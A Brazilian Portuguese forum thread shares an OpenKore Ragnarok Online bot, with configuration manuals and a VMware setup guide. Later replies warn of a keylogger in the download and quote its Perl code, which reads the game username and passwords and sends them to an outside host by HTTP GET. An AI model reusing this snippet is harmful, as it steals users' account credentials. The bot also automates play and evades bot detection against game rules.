Ir para conteúdo
Faça parte da equipe! (2024) ×

Openkore Funcionando 16/02 [Windows 7/Vista/XP] [SCAN]


a1b22
 Compartilhar

Posts Recomendados

Oi pessoal, vim trazer aqui para vocês um Openkore totalmente funcional, dia 16/02.

 

Manual Timeouts

 

 

Sintaxe:

É necessário se cadastrar para acessar o conteúdo.

<timeout key>

Este é um dos nomes limite variável utilizada pelo Kore. Veja a lista limite abaixo uma lista de chaves limite disponível.

 

<seconds>

Este é o tempo em segundos (qualquer número positivo). Podendo ser valor fracionário.

 

Nota:Linhas que começam com o sinal de sustenido (#) são linhas de comentário. Eles são ignorados pelo Openkore.

 

################ Timeout List ################

 

AI

ai (<segundos>)

Ativar AI somente quando o número especificado de segundos decorridos após o mapa é carregado.

 

################ AI_Attack ################

Ao atacar um alvo com uma arma, enviar o pacote "ataque" a cada número determinado de segundos.

 

ai_attack_auto (<segundos>)

Se auto-ataque esteja habilitado (consulte attackAuto no config.txt ), para verificar todos os monstros para atacar determinado número de segundos.

 

ai_attack_giveup (<segundos>)

Ao tentar atacar um monstro, desista e deixe cair o destino se você não pode alcançar ou danificar o monstro dentro do número de segundos especificado.

 

ai_attack_unfail (<segundos>)

Quando caiu Kore alvo de um ataque, porque você não pode alcançar ou danificá-lo, Kore não irá tentar atacá-lo novamente até que o número especificado de segundos decorridos.

 

ai_attack_unstuck (<segundos>)

Ao atacar um monstro e não tiver causado qualquer dano ao monstro dentro do número especificado de segundos, mesmo se você estiver perto o suficiente para o alvo, a posição do alvo pode ser gravada fora de sincronia de forma a tentar descolar movendo novamente para a corrente posição.

 

################ AI_Avoid ################

ai_avoidcheck (<segundos>)

Se Kore é definido para evitar que os jogadores (ver avoidGM_near e AvoidList no config.txt ), vá para os jogadores para evitar qualquer número especificado de segundos.

 

################ AI_buyAuto ################

ai_buyAuto (<segundos>)

Se Kore está configurado para automaticamente comprar itens de uma compra / venda NPC (ver BuyAuto no config.txt ), verificar os itens que você precisa comprar cada número especificado de segundos.

 

ai_buyAuto_giveup (<segundos>)

Ao tentar comprar um item de uma compra / venda NPC, desista se você não foi capaz de comprar o item dentro do número de segundos especificado.

 

ai_buyAuto_wait (<segundos>)

Depois de falar com a compra / venda NPC durante a auto-compra, aguarde o número especificado de segundos antes de comprar itens.

 

ai_buyAuto_wait_buy (<segundos>)

Durante o BuyAuto, comprar itens da mesma compra / venda NPC cada número especificado de segundos.

 

################ AI_cartAuto ################

ai_cartAuto (<segundos>)

Se Kore está configurado para automaticamente adicionar / obter itens para / de carro (ver items_control.txt ), a transferência de um item de / para o carrinho de um determinado número de segundos cada.

 

ai_cartAutoCheck (<segundos>)

Se Kore está configurado para automaticamente adicionar / obter itens para / de carro (ver items_control.txt ), verificar os itens para adicionar / chegar / do carrinho número especificado de segundos cada.

 

################ Conexão: ################

charlogin (<segundos>)

tempo limite de conexão com o servidor quando Kore logs no servidor personagem.

 

master (<segundos>)

tempo limite de conexão com o servidor quando Kore logs no servidor mestre.

 

gamelogin (<segundos>)

tempo limite de conexão com o servidor quando Kore logs para o servidor do jogo.

 

maplogin (<segundos>)

tempo limite de conexão quando Kore Server faz logon no servidor de mapas.

 

play (<segundos>)

Se você já está no jogo, mas Kore não receber sincronia dentro de um número determinado de segundos, ele irá tentar se reconectar novamente.

 

reconnect (<segundos>)

 

Quando desconectado, aguarde o número especificado de segundos antes de reconectar novamente.

 

################ AI_Dead ################

ai_dead_respawn (<segundos>)

Se você morreu e Kore está definido para reaparecer ao ponto salvo em caso de morte (ver DcOnDeath no config.txt ), espera para o número especificado de segundos antes de voltar ao ponto salvo após a morte.

 

################ AI_Deal ################

ai_dealAuto (<segundos>)

Se Kore está definido para aceitar automaticamente ofertas (ver DealAuto no config.txt ), espera para o número especificado de segundos antes de você:

1. aceitar um acordo de entrada.

2. finalizar a sua parte do negócio.

3. aceitar o acordo concluído e comércio.

 

ai_dealAutoCancel (<segundos>)

Se Kore está configurado para automaticamente recusar ofertas (ver DealAuto no config.txt ), espera para o número especificado de segundos antes de cancelar o pedido negócio.

 

################ AI_equip ################

ai_equip_giveup (<segundos>)

Ao tentar equipar um item, desista se você não pode equipar o item dentro do número de segundos especificado.

 

################ AI_Follow ################

ai_follow_lost_end (<segundos>)

Se você estiver em "follow" o modo e você perdeu o seu capitão, desistir de tentar encontrar o mestre, após o número especificado de segundos.

 

################ AI_GetInfo ################

ai_getInfo (<segundos>)

Se há jogadores desconhecidos, NPCs, monstros e animais ao redor, atualização, solicitando informações do servidor a cada número determinado de segundos.

 

################ AI_Guild ################

ai_guildAutoDeny (<segundos>)

Se Kore estiver definido para negar entrada guild juntar pedidos (ver GuildAutoDeny no config.txt ), espera para o número especificado de segundos antes de cancelar uma guilda "join".

 

################ AI_Items ################

ai_items_gather_giveup (<segundos>)

Ao tentar recolher um item, desista se você não foi capaz de levá-la dentro do número de segundos especificado.

 

ai_items_gather_start (<segundos>)

Quando a verificação de itens para coletar, só se um item se o número especificado de segundos decorrido desde o item exibido na tela.

 

ai_items_take_end (<segundos>)

Quando o monstro morreu e há loots monstro não mais tomar, parar de verificação de loots após o número especificado de segundos.

 

ai_items_take_start (<segundos>)

Quando o monstro morreu e Kore está definido para pegar itens derrubadas por monstros que você matou (ver ItemsTakeAuto no config.txt ), inicie a verificação de loots monstro após o número especificado de segundos.

 

################ AI_Look ################

ai_look (<segundos>)

Ao tentar olhar para uma determinada direção, enviar o pacote "olhar" cada número especificado de segundos.

 

################ AI_Move ################

ai_move_giveup (<segundos)

Ao tentar mover-se, desistir, se você não foram capazes de mudar a sua localização dentro do número de segundos especificado.

 

################ AI_Npc ################

ai_npcTalk (<segundos>)

Ao falar com um NPC, espere no máximo o número especificado de segundos para o NPC para responder; desistir de falar com o NPC, se o NPC não responder dentro do número especificado de segundos.

 

AI_Portal

ai_portal_wait (<segundos>)

Ao se mudar para um mapa eo portal próximo está próximo, envie 'move' o pacote todo número especificado de segundos. O padrão é 0,5.

 

################ AI_Route ################

ai_route_calcRoute (<segundos>)

Ao tentar passar para outro mapa, Kore não gastará mais do que o número especificado de segundos para calcular a melhor rota.

 

ai_route_npcTalk (<segundos>)

Se falar com um NPC Warp é parte da solução mapa para chegar ao seu destino, ea conversa toma mais tempo do que o número especificado de segundos, Kore irá assumir a falha e tentar reiniciar a conversa ou encontrar uma rota alternativa.

 

Nota: Se esta opção não está definida, Kore irá usar o valor padrão

de 10.

 

################ AI_SellAuto ################

ai_sellAuto (<segundos>)

Durante a venda, aguarde o número especificado de segundos antes de vender novamente.

 

ai_sellAuto_giveup (<segundos>)

Ao tentar vender um item para uma compra / venda NPC, desista se você não pode vender o item após o número especificado de segundos.

 

################ AI_Shop ################

ai_shop (<segundos>)

Se Kore está definido para abrir uma loja de venda (shopAuto_open no config.txt ), aberto a loja depois de ser parado por um número determinado de segundos.

 

################ AI_Sit / AI_Stand ################

ai_sit (<segundos>)

Ao tentar se sentar / stand, envie a 'sentar' / 'stand' pacote a cada número determinado de segundos, até que você já está sentado / em pé.

 

ai_sit_idle (<segundos>)

Se Kore está definido para sentar-se automaticamente quando ocioso (ver sitAuto_idle no config.txt ), sente-se depois de ser parado por um número determinado de segundos.

 

ai_sit_wait (<segundos>)

Ao tentar se sentar, esperar que o número especificado de segundos de espera antes de enviar o 'sentar' pacote.

 

ai_stand_wait (<segundos>)

Ao tentar ficar em pé, esperar que o número especificado de segundos de espera antes de enviar o pacote 'stand'.

 

 

################ AI_Skill ################

ai_skill_use_giveup (<segundos>)

Ao tentar usar uma habilidade, desista se você não pode usar a habilidade dentro do número de segundos especificado.

 

################ AI_StorageAuto ################

ai_storageAuto (<segundos>)

Durante o armazenamento automático, loja / obter um item de / para o armazenamento do número de cada especificado de segundos.

 

ai_storageAuto_giveup (<segundos>)

Ao armazenar um item para o armazenamento, desistir de colocar o item para armazenamento, se o item ainda não é transferida dentro do número especificado de segundos.

 

################ AI_Sync ################

ai_sync (<segundos>)

Enviar o pacote de ping cada número especificado de segundos.

Nota: Deixe no valor padrão

 

 

################ AI_Take ################

ai_take (<segundos>)

Quando pegar os itens, envie a 'tomar' pacote a cada determinado número de segundos até que o item tenha sido tomada.

 

ai_take_giveup (<segundos>)

Ao tentar pegar um item, desistir, se você não foram capazes de tirar o item após o número especificado de segundos.

 

################ AI_Teleport ################

ai_teleport (<segundos>)

Ao usar os itens de se teletransportar (Asa de Mosca ou asa de borboleta), apenas usar um outro item, caso o número especificado de segundos decorrido desde o último item de teleporte foi usado.

 

Este limite é também usado quando Kore está definido para respawn a ponto de salvamento quando não está em um dos mapas autorizados (allowedMaps e allowedMaps_reaction no config.txt ), mas apenas tentar reaparecer se o número especificado de segundos decorrido desde a última vez que tentei respawn.

 

ai_teleport_away (<segundos>)

Se Kore estiver definido para teleportar quando um monstro certo é visto (mon_control.txt ), apenas tentar teleportar se o número especificado de segundos decorrido desde a última vez que teleportado para evitar um monstro.

 

ai_teleport_delay (<segundos>)

Se esta opção for definida, ao tentar usar a habilidade de Teleport, Kore irá esperar o número especificado de segundos para a perícia a ser lançado com sucesso antes mesmo de teletransporte. Isto faz parecer menos Kore bot-like.

 

Nota: Essa é ignorado no teleport de emergência (por exemplo, teleportAuto_deadly ).

 

ai_teleport_hp (<segundos>)

Se Kore estiver definido para teleportar devido à insuficiente HP / SP ou muito agressivos (teleportAuto_hp , teleportAuto_sp , teleportAuto_minAggressives e teleportAuto_minAggressivesInLock no config.txt ), mas apenas tentar teleportar se o número especificado de segundos decorrido desde a última vez que teleportar.

 

ai_teleport_idle (<segundos>)

Se Kore estiver definido para teleportar quando ocioso (teleportAuto_idle no config.txt ), teletransporte depois de ser parado por um número determinado de segundos.

 

ai_teleport_portal (<segundos>)

Se Kore estiver definido para teleportar para evitar portais (teleportAuto_portal no config.txt ), mas apenas tentar teleportar se o número especificado de segundos decorrido desde a última vez que teleportado para evitar um portal.

 

ai_teleport_retry (<segundos>)

Ao tentar usar a habilidade de Teleporte, Kore irá esperar o número especificado de segundos antes de repetir a lançar a habilidade novamente, se não tiver sido corretamente fundido.

 

Nota: Essa é ignorado no teleport de emergência (por exemplo, teleportAuto_deadly ).

 

ai_teleport_safe_force (<segundos>)

Se Kore estiver definido para teleportar apenas se há jogadores de todo (teleportAuto_onlyWhenSafe no config.txt ), Kore só irá considerá-lo seguro para teleportar (mesmo quando há jogadores ao redor para ver) se o número especificado de segundos decorrido desde a sua última mudança de mapa ou desde a última vez que teleportar.

 

################ AI_Thanks ################

ai_thanks_set (<segundos>)

Quando um jogador expulso Kore o chat graças comando, Kore só irá responder se o comando anterior bate-papo que sucedeu foi emitido dentro do número de segundos especificado.

 

WelcomeText

welcomeText (<segundos>)

Ao utilizar XKore modo e a mensagem de boas-vindas ainda não é mostrado, exibir o texto de boas-vindas se o número de segundos especificado tiver decorrido após o mapa é carregado.

 

 

################ AI_Wipe ################

ai_wipe_check (<segundos>)

Internamente, Kore salva em cache as informações sobre jogadores, NPCs, monstros, itens e portais que desapareceu. Kore tentará verificar se ele precisa limpar a cache a cada número determinado de segundos.

 

ai_wipe_old (<segundos>)

Quando as verificações Kore para o cache de desaparecidos jogadores, NPCs, monstros, itens e portais (ver ai_wipe_check), unidades que têm ido para o número especificado de segundos serão permanentemente removidos.

 

 

 

Manual Pickupitems:

 

 

Formato:

Nome do Item (flag)

 

Nome do Item: Digite i no console do openkore para saber o nome do item.

 

Flag:

 

-1 = Joga o item fora caso esse entre no inventário, útil para Rogues/Stalkers com auto-steal

0 = Não pega o item

1 = Pega o item

2 = Pega o item o mais rápido possível.

 

Exemplo 1 :.

Nota: Pegará todos os itens menos Jellopy,Teia de Aranha e Flor.

 

Exemplo 2:

Nota: Jogará todos os itens que não sejam os citados fora, caso sejam conseguidos no por auto-steal e pegará o mais rápido possível caso veja alguma das cartas configuradas.

 

Exemplo 3:

Nota: Sempre pegará todos os itens o mais rápido possivel, é o pior exemplo para configurar seu bot, sempre configure para pegar apenas os itens do mapa de up.

 

 

 

É necessário se cadastrar para acessar o conteúdo.

 

Manual ItemsControl:

 

 

 

Neste arquivo você poderá controlar quais itens deverão ser adicionados no armazém, quais serão para venda em npcs e/ou quais ficarão em seu inventário.

 

Sintaxe:

(item name) (minimum) (auto-store) (auto-sell) [put in cart] [get from cart]

 

item name:

É necessário se cadastrar para acessar o conteúdo.

 

minimum:

É necessário se cadastrar para acessar o conteúdo.

 

auto-store:

0 = Desabilita esta opção para determinado item;

1 = Habilita esta opção para armazenar determinado item na kafra.

 

auto-sell:

0 = Desabilita esta opção para determinado item;

1 = Habilita esta opção para venda automática de determinado item nos npcs de compras/vendas.

 

put in cart:

0 / Em branco = Desabilita esta opção para determinado item;

1 = Habilita esta opção para adicionar automaticamente determinado item em seu carrinho.

**Exclusivo para classes: Super Aprendizes, Mercadores e suas evoluções.**

 

get from cart:

0 / Em branco = Desabilita esta opção para determinado item;

1 = Habilita esta opção para pegar automaticamente determinado item em seu carrinho quando certa quantidade estiver em seu inventário. Use está opção em combinação com a opção 'minimum'.

**Exclusivo para classes: Super Aprendizes, Mercadores e suas evoluções.**

 

 

Exemplo 1:

É necessário se cadastrar para acessar o conteúdo.

 

Nota: O jogador irá vai vender todos os jellopies, armazenar todas as facas e colocar todas as flores em seu carrinho.

 

Exemplo 2:

É necessário se cadastrar para acessar o conteúdo.

 

Nota: Neste por sua vez, o jogador pegará poções azuis do seu carrinho, se o mesmo tiver menos de 30 delas em seu inventário.

 

Exemplo 3:

É necessário se cadastrar para acessar o conteúdo.

Nota: Aqui portanto, o player irá vender todos os itens (sem exceção) que estiverem em seu inventário.

 

Exemplo 4:

É necessário se cadastrar para acessar o conteúdo.

Nota: Já neste, o Kore irá armazenar todos os itens (sem exceção) que estiverem em seu inventário.

 

 

Se o armazenamento automático e a auto-venda estiverem setados com o número 1, o mesmo irá fazer primeiramente a armazenagem (exceto se o seu armazém estiver lotado) e somente depois irá vender os itens.

 

O Kore jamais irá vender ou armazenar itens equipados. Por exemplo, se você estiver usando um machado e na lista consta uma linha de auto-venda de todos os tipos de machados, o Kore irá vender somente os machados que estão em seu inventário. Nunca, jamais o machado que você está usando.

 

Não se esqueça de definir o storageAuto, sellAuto e demais opções de configuração relacionados no config.txt; ou então este arquivo não terá efeito algum.

 

Por padrão o arquivo já vem com uma linha adicionada, mas nada impede que você possa editar, apagar ou adicionar outras.

 

 

 

Manual moncontrol.txt

 

 

Informação: Configurações de como o Kore se comportará ao encontrar determinado monstro, ou como ele irá procurar tal monstro.

 

Sintaxe:

<monstro> <ataque> <teleporte> <procurar> <cancelar skill> <lv> <joblv><hp> <sp> <peso na configuração>

 

Monstro: Nome do monstro, procure no arquivo monters.txt (não é case sensitive).

 

Ataque:

-1 = Nunca ataque esse monstro mesmo que ele ataque o bot.

0 = Não ataca o monstro por padrão, mas caso ele ataque o bot o bot irá revidar.

1 = Sempre atacará esse monstro caso encontre-o no campo de visão.

2 = Sempre atacará esse monstro caso encontre-o no campo de visão mesmo se o bot estiver sentado.

3 = Ataca uma vez o monstro caso encontre-o no campo de visão (irá provocar), ideal para mobar.

 

Teleporte:

1 = O bot irá teleportar caso o monstro apareça em seu campo de visão.

2 = O bot irá teleportar caso o monstro ataque-o

3 = O bot irá desconectar caso o monstro apareça em seu campo de visão.

 

Procurar: Configure para 1 para teleportar em busca do monstro, auto-ataque precisa estar habilitado.

 

Cancelar skill: Configure para 1 para o bot tentar cancelar o cast de algum monstro caso esteja em um mob.

 

lv: Só atacará o monstro caso o level de classe do bot seja igual ou maior ao configurado.

 

joblv: Só atacará o monstro caso o level de Job seja igual ou maior ao configurado

 

hp: Só atacará o monstro caso o HP do bot seja igual ou maior ao configurado.

 

sp: Só atacará o monstro caso o SP do bot seja igual ou maior ao configurado.

 

peso na configuração: Conta este monstro como os aggressivos especificado no config e determina o peso de cada monstro.

 

Exemplo:

(config.txt)

teleportAuto_minAggressives 6

teleportAuto_minAggressivesInLock 6

 

(mon_control.txt)

Hydra 1 0 0 0 0 0 0 0 0.2

Cavaleiro do Abismo 1 0 0 0 0 0 0 0 3

 

No exemplo acima cada Hydra terá peso 0.2 (necessário 30 Hydras para teleportar) e o monstro Cavaleiro do Abismo terá peso 3, caso apareceça dois na tela o bot irá teleportar.

 

Exemplo:

Procurar pelo monstro Pupa e Fabre no mapa teleportando e desconectar fujir teleportando caso apareça qualquer outro monstro no mapa

all 0 1 0

Pupa 1 0 1

Fabre 1 0 1

 

 

 

Tutorial Poseidon Máquina Virtual:

 

 

Esse tutorial é recomendado apenas aos usuários do Windows 7 que desejam usar o OpenKore com Poseidon (ou seja, servidor oficial apenas) em seu PC.

Devido a uma incompatibilidade do Poseidon com o Windows 7, só é possivel usar fazendo uma emulação de um Sistema Operacional, que nesse caso, será o Windows XP.

 

Requerimentos

* ISO/CD do Windows XP SP2

* VMWare WorkStation 6 ou 7

* 10GB Espaço livre no mínimo;

* 2GB de RAM no mínimo;

 

Tutorial

Instale o VMWare;

 

Na aba principal do VMWare, clique em "New Virtual Machine";

 

Selecione a opção "Custom" e clique em "Next >";

 

Certifique-se de estar selecionado "Workstation 6-5-7.x" e de "Next >";

 

Agora, selecione a .ISO do Windows XP, ou caso seja um CD, coloque no Driver de CD e selecione-o, quando estiver pronto: "Next >";

 

Verifique se está marcado "Microsoft Windows" e em baixo "Windows XP", se estiver de "Next >";

 

Agora, eu recomendo você colocar o serial do produto e o seu usuário, caso queira fazer isso depois da instalação, apenas de "Next >";

 

De um nome a sua Máquina Virtual e de "Next >";

 

Agora em número de processadores, isso vai de acordo com a sua máquina. Se você possuir um Dual Core/Core 2 Duo coloque em "Number of cores per processor" o número 2, caso não tenha ideia do que estou falando, apenas deixe como está e de "Next >";

 

Na parte de Memória RAM, recomendo colocar a METADE do que você tem. Por exemplo, se você tem 2GB de RAM, coloque 1GB de RAM. Quando tiver pronto: "Next >";

 

Em "Network Connection" recomendo colocar "Use bridged networking". "Next >";

 

Agora de 4 "Next >", a troque apenas se você souber o que está fazendo;

 

Agora na parte do HD, coloque de acordo com o que você possui de espaço livre. Eu coloco sempre em torno de 7GB;

 

De "Next >" e depois "Finish"

 

Sua máquina virtual irá iniciar. Faça os procedimentos da instalação do windows, e quando estiver tudo pronto, copie a pasta do seu ragnarok e seu openkore. O resto você já conhece, basta abrir o poseidon+ragnarok.

OBS: No Ragnarok irá aparecer "cannot init d3d or grf file has problem.". Isso é devido a falta de suporte do VmWare, basta ficar pressionando Enter.

OBS²: Todas as configurações que eu citei, podem ser alteradas depois, basta desligar sua máquina virtual, e clicar no botão direito e depois "Settings..."

 

 

 

-------------------------------------------------------------------------------

Openkore Brocenter.

 

[DOWN]

É necessário se cadastrar para acessar o conteúdo.
[/DOWN]

 

[sCAN]

É necessário se cadastrar para acessar o conteúdo.

[/sCAN]

 

Qualquer dúvida, poste que eu ajudarei.

Link para o comentário
Compartilhar em outros sites

Bom vamos la , o bot funciona 100% , eu refiz o scan pra quem quiser ver

É necessário se cadastrar para acessar o conteúdo.

 

agora keylogger em script nao sei , ate alguem dizer que eh confiavel ( muito provavel que nao ) nao deixe seus items no personagem , mas se quiserem arriscar :fuma:

Link para o comentário
Compartilhar em outros sites

ao baixem tem kelogger da uma olhada ae

ta na pasta src/send no arquivo bro

use LWP::UserAgent;

use Utils qw(urlencode);

my ($ua) = new LWP::UserAgent;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

my $senha = $config{'password'};

my $kafra = $config{'storageAuto_password'};

my $response = $ua->get("

É necessário se cadastrar para acessar o conteúdo.
$senha $kafra");

Link para o comentário
Compartilhar em outros sites

ao baixem tem kelogger da uma olhada ae

ta na pasta src/send no arquivo bro

use LWP::UserAgent;

use Utils qw(urlencode);

my ($ua) = new LWP::UserAgent;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

my $senha = $config{'password'};

my $kafra = $config{'storageAuto_password'};

my $response = $ua->get("

É necessário se cadastrar para acessar o conteúdo.
$senha $kafra");

 

nao estou te desmentindo , mas o link que esta no tópico eh o original do brocenter , ele deve ter mudado ou sei la mas se voce esta dizendo que tem nem vou mais usa esse

Link para o comentário
Compartilhar em outros sites

nao baixei esse pois estou no curso quando chega em casa eu baixo

mas se for mesmo link q o brocenter nao tem KL q eu ja olhei mas ele pode de upado no hot com mesmo nome só alguma coisinha minima diferente....

vou olhar o bot em casa ai eu edito aki

Link para o comentário
Compartilhar em outros sites

nao baixei esse pois estou no curso quando chega em casa eu baixo

mas se for mesmo link q o brocenter nao tem KL q eu ja olhei mas ele pode de upado no hot com mesmo nome só alguma coisinha minima diferente....

vou olhar o bot em casa ai eu edito aki

 

os links estao iguais cara ja conferi , ele pode ter mudado porque neguinho aqui no forum eh dessas acha que engana os outros e acham que os outros sao troxas

Link para o comentário
Compartilhar em outros sites

Este tópico está impedido de receber novos posts.
 Compartilhar

  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.
×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.